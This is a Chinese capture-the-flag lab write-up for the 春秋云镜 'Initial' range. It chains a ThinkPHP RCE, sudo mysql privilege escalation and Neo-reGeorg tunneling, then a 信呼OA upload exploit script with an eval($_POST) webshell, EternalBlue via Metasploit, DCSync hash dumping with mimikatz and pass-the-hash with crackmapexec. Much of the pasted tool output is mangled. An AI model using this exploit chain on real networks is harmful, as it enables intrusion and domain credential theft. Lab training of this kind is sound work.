本文最后更新于:2024年11月1日 下午
春秋云镜-Initial flag1 打开网站,发现是个xx管理系统页面
用fscan扫一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 PS D:\tools\fscan> ./fscan -h 39.101 .204.146 '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan 39.101.204.146:22 open 39.101.204.146:80 open [*] alive ports len is: 2 start vulscan [*] WebTitle http://39.101.204.146 code:200 len:5578 title:Bootstrap Material Admin [+] PocScan http://39.101.204.146 poc-yaml-thinkphp5023-method-rce poc1 已完成 2/2 [*] 扫描结束,耗时: 27.0242366s
扫到个thinkphp的RCE
用工具 getshell
然后蚁剑连接
在根目录中没有找到flag
root目录权限不够进不去,flag可能在这里
于是尝试提权
1 sudo -l #列出当前用户可以使用 sudo 执行的命令
1 2 3 4 5 (www-data:/var/www/html) $ sudo -l
注意最后一行(root) NOPASSWD: /usr/bin/mysql,这说明我们可以通过sudo无需密码运行 /usr/bin/mysql
利用mysql提权,参考渗透测试:Linux提权精讲(三)之sudo方法第三期
1 sudo mysql -e '\! /bin/sh' #启动一个具有root权限的shell会话
由于蚁剑的终端是不完整的,并不是真正意义上的交互式shell,无法启动shell会话,所以执行上述语句不会有任何效果。
但我们可以将/bin/sh替换为我们想要执行的命令,在root目录中找到flag:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 (www-data:/var/www/html) $ sudo mysql -e '\! ls /root'
内网穿透 接下来就要打内网了
先ip a看看ip:
1 2 3 4 5 6 7 8 9 10 11 12 13 (www-data:/var/www/html) $ ip a1 : lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 00 :00 :00 :00 :00 :00 brd 00 :00 :00 :00 :00 :00 inet 127.0 .0.1 /8 scope host loinet6 ::1 /128 scope host 2 : eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000 00 :16 :3 e:13 :a1:a9 brd ff:ff:ff:ff:ff:ffinet 172.22 .1.15 /16 brd 172.22 .255.255 scope global dynamic eth0315359388 sec preferred_lft 315359388 secinet6 fe80::216 :3 eff:fe13:a1a9/64 scope link
ip为172.22.1.15
然后用蚁剑上传fscan扫描内网
1 2 chmod +x fscan #给fscan添加可执行权限
扫描结果默认保存在result.txt中
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
得出如下信息:
1 2 3 172.22.1.2 DC域控制器172.22.1.21 MS17-010 永恒之蓝172.22.1.18 信呼OA系统
我们需要内网穿透才能对这些内网ip进行操作
我使用的是Neo-reGeorg 这款内网渗透工具
与frp相比Neo-reGeorg不需要公网ip
先生成Neo-reGeorg的webshell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 PS D:\tools\Neo-reGeorg-5 .2.0 > python neoreg.py generate -k password "$ $ $ $ $ $ '' 'M$ '$ $ $ @m :$ $ $ $ $ $ $ $ $ $ $ $ $ $ ''$ $ $ $ ' '$ ' 'JZI'$ $ & $ $ $ $ ' '$ $ $ '$ $ $ $ $ $ $ $ J$ $ $ $ ' m$ $ $ $ $ $ $ $ , $ $ $ $ @ '$ $ $ $_ Neo-reGeorg '1t$ $ $ $ ' '$ $ $ $ < '$ $ $ $ $ $ $ $ $ $ ' $ $ $ $ version 5.2.0 '@$ $ $ $ ' $ $ $ $ ' '$ $ $ $ '$ $ $ @ 'z$ $ $ $ $ $ @$ $ $ r$ $ $ $ $ | '$ $v c$ $ '$ $v $ $v $ $ $ $ $ $ $ $ $ # $ $x $ $ $ $ $ $ $ $ $twelve $ $ $ @$ ' @$ $ $ @L ' '<@$ $ $ $ $ $ $ $ ` $ $ '$ $ $ [ Github ] https://github.com/L-codes/Neo-reGeorg [+] Mkdir a directory: neoreg_servers [+] Create neoreg server files: => neoreg_servers/tunnel.ashx => neoreg_servers/tunnel.aspx => neoreg_servers/tunnel.go => neoreg_servers/tunnel.jsp => neoreg_servers/tunnel.jspx => neoreg_servers/tunnel.php
在neoreg_servers文件夹中生成了各种语言的webshell
由于靶机使用的是php,我们只需将tunnel.php上传到靶机上的web服务目录(/var/www/html)
然后在本机执行命令进行连接:
1 python neoreg.py -k password -u http://xx/tunnel.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 PS C:\Users\Hesyer\Desktop\道具\Neo-reGeorg-5 .2.0 > python neoreg.py -k password -u http://39.98 .117.52 /tunnel.php"$ $ $ $ $ $ '' 'M$ '$ $ $ @m :$ $ $ $ $ $ $ $ $ $ $ $ $ $ ''$ $ $ $ ' '$ ' 'JZI'$ $ & $ $ $ $ ' '$ $ $ '$ $ $ $ $ $ $ $ J$ $ $ $ ' m$ $ $ $ $ $ $ $ , $ $ $ $ @ '$ $ $ $_ Neo-reGeorg '1t$ $ $ $ ' '$ $ $ $ < '$ $ $ $ $ $ $ $ $ $ ' $ $ $ $ version 5.2.0 '@$ $ $ $ ' $ $ $ $ ' '$ $ $ $ '$ $ $ @ 'z$ $ $ $ $ $ @$ $ $ r$ $ $ $ $ | '$ $v c$ $ '$ $v $ $v $ $ $ $ $ $ $ $ $ # $ $x $ $ $ $ $ $ $ $ $twelve $ $ $ @$ ' @$ $ $ @L ' '<@$ $ $ $ $ $ $ $ ` $ $ '$ $ $ [ Github ] https://github.com/L-codes/Neo-reGeorg +------------------------------------------------------------------------+ Log Level set to [ERROR] Starting SOCKS5 server [127.0.0.1:1080] Tunnel at: http://39.98.117.52/tunnel.php +------------------------------------------------------------------------+
在代理工具proxifier上配置 socks5 代理即可
现在,我们可以访问上述内网ip了
flag2 访问之前fscan扫描到的信呼协同办公系统172.22.1.18
可以看到版本为2.2.8
搜索可知该版本存在文件上传漏洞,获取exp并利用
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 import requests'http://172.22.1.18/' '?a=check&m=login&d=&ajaxbool=true&rnd=533953' '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913' '/task.php?m=qcloudCos|runt&a=run&fileid=11' 'rempass' : '0' ,'jmpass' : 'false' ,'device' : '1625884034525' ,'ltype' : '0' ,'adminuser' : 'YWRtaW4=' ,'adminpass' : 'YWRtaW4xMjM=' ,'yanzm' : '' 'file' : open ('1.php' , 'r+' )})str (r.json()['filepath' ])"/" + filepath.split('.uptemp' )[0 ] + '.php' id = r.json()['id' ]f'/task.php?m=qcloudCos|runt&a=run&fileid={id } ' "?1=system('dir');" )print (r.text)
1 2 <?php eval ($_POST ["1" ]);?>
执行exp即可获得文件上传的路径
1 2 3 PS C:\Users\Hesyer\Desktop\道具\脚本> python -u "c:\Users\Hesyer\Desktop\道具\脚本\exp.py" 1 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2024 -10 \27 _17552986.php</b> on line <b>1 </b><br />
拼接路径后url为http://172.22.1.18/upload/2024-10/27_17552986.php
然后用蚁剑连接
在Administrator用户目录下找到 flag2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 # C:/Users/Administrator/flag/flag02.txt
flag3 接下来在kali中使用Metasploit Framework攻击存在ms17-010(永恒之蓝)的172.22.1.21
首先在kali里配置proxychains4(linux命令行代理神器)
在/etc/proxychains4.conf文件中最下面的ProxyList上加上socks5 ip 端口 即可
这里的IP是vm虚拟机nat模式(我的kali的虚拟机网络连接模式)下本机的ip
1 2 [ProxyList]
vm虚拟机nat模式下本机的ip可以在本机中用ipconfig命令查看,在VMware Network Adapter VMnet8里
这里最好测试一下kali虚拟机能否ping通这个ip,如果ping不通,上面设置的代理是无效的,
解决方法是打开Windows防火墙—–>高级设置—–>入站规则,找到配置文件类型为“公用”的“文件和打印共享(回显请求 – ICMPv4-In)”规则,设置为允许
然后命令行执行
这将以静默模式打开一个新的 bash 会话,所有在这个会话中输入的命令都将自动通过 proxychains4 代理执行,
静默模式下proxychains4的大量初始化信息将被隐藏
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 ┌──(root㉿kali)-[~]help <command > to learn more about any command ' ' cdkOOOko:.'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO' 'oOO. ,OOOOOOOc oOOOOOO. .OOOO. :OOOO. ,OOOOOOo lOOOOO. .OOOO. :OOOO. ,OOOOOl ;OOOO' .OOOO. :OOOO. ;OOOO;set a TARGET with set TARGET 'Neutralize implant'
第一个模块影响版本比较多,所以使用它进行后续操作
依次输入以下命令发起永恒之蓝攻击:
1 2 3 4 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid set RHOSTS 172.22.1.21
运行成功会出现meterpreter>
该Meterpreter是metasploit的一个扩展模块,可以调用metasploit的一些功能,对目标系统进行更深入的渗透,入获取屏幕、上传/下载文件、创建持久后门等
1 2 3 4 5 6
虽然打入了该主机,但此主机上并无flag,最后的flag在windows DC 域控制器里
接下来需要通过DCSync来导出所有用户的 hash
DC(Domain Controller,域控制器)是 Windows 域网络架构中的核心服务器,
负责管理并维护域中的所有用户、计算机、组和策略等信息。
在企业环境中,域控制器主要通过 Active Directory(AD)来管理和验证用户身份,实现资源的集中控制和网络安全管理。
DCSync 攻击基于微软的 Active Directory 复制协议(Directory Replication Service,DRS)。
在 Windows 域中,多个域控制器(DC)之间会进行数据同步,以确保所有 DC 拥有一致的用户凭据、组策略和其他目录信息。
DCSync 攻击的关键在于,攻击者可以伪装成一个域控制器,通过 DRS 协议向其他域控制器请求复制敏感的身份数据。
具体来说,DCSync 攻击会模拟一个合法的域控制器发起同步请求。其他域控制器在收到请求时,会按照 Active Directory 复制机制,将存储的凭据信息传送给请求者,而攻击者便可以利用该机制轻松获得:
用户的 NTLM 哈希:用于解密或破解用户密码。
Kerberos 密钥(AES 哈希):用于生成 Kerberos 票证。
Kerberos TGT 密钥:可用于持久性攻击,创建伪造的 TGT(Ticket Granting Ticket)。
DCSync 攻击要求攻击者获得相当高的权限才能执行。以下是实现 DCSync 攻击的主要前提:
域管理员(Domain Admins)或企业管理员(Enterprise Admins)权限 :通常只有域管理员才有足够的权限发起 DRS 请求以提取凭据。获取到管理权限的账户(如 Replicator 组) :具备特定权限的用户或服务账户也可能拥有域复制权限。
然后进行哈希传递攻击实现DC上的任意命令执行
在 Windows 系统中,身份验证过程使用 NTLM 哈希来验证用户身份。
当用户登录时,系统会生成用户的 NTLM 哈希并将其发送给身份验证服务(如域控制器),以确认用户的身份。
而在 Pass-the-Hash 哈希传递攻击中,攻击者获取到 NTLM 哈希后,直接使用该哈希来模拟登录,不需要知道密码的明文:
获取凭据哈希 :攻击者首先在目标系统上通过技术手段(如内存提取、Mimikatz 工具、或 NTLM 哈希窃取工具)获得用户的 NTLM 哈希值。伪装身份登录 :攻击者在其他系统上使用该哈希进行身份验证,以便模拟被攻击用户的身份完成登录。此时身份验证服务会认为攻击者是该用户,因为哈希值有效。
输入以下命令来获取用户的 hash
1 2 load kiwi # 调用mimikatz模块,mimikatz是一款著名的内存提取工具,可以用于获取密码明文、哈希值、Kerberos 票证等
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 meterpreter > load kiwi'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )'#####' > http://pingcastle.com / http://mysmartlogon.com ***/"lsadump::dcsync /domain:xiaorang.lab /all /csv" exit 'xiaorang.lab' will be the domain'DC01.xiaorang.lab' will be the DC server'xiaorang.lab'
提取Administrator用户的 hash
1 Administrator 10 cf89a850fb1cdbe6bb432b859164c8
使用crackmapexec来进行哈希传递攻击
crackmapexec 是一个渗透测试工具,用于测试 SMB、SSH、LDAP 等服务
1 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(root㉿kali)-[~]command 172.22 .1.2 445 DC01 172.22 .1.2 445 DC01 172.22 .1.2 445 DC01 flag03: e8f88d0d43d6}172.22 .1.2 445 DC01 172.22 .1.2 445 DC01 Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.
参考 春秋云境-Initial | Chimedal
春秋云境Initial详解 | Qanux’s space
春秋云境Initial-WP(附带详细代理过程)_172.22.1.18v-CSDN博客
工具之使用教程Neo-reGeorg_neoregeorg-CSDN博客
超详细虚拟机与主机网络连接以及互Ping不通问题的解决_桥接模式windows2008虚拟机ping主机-CSDN博客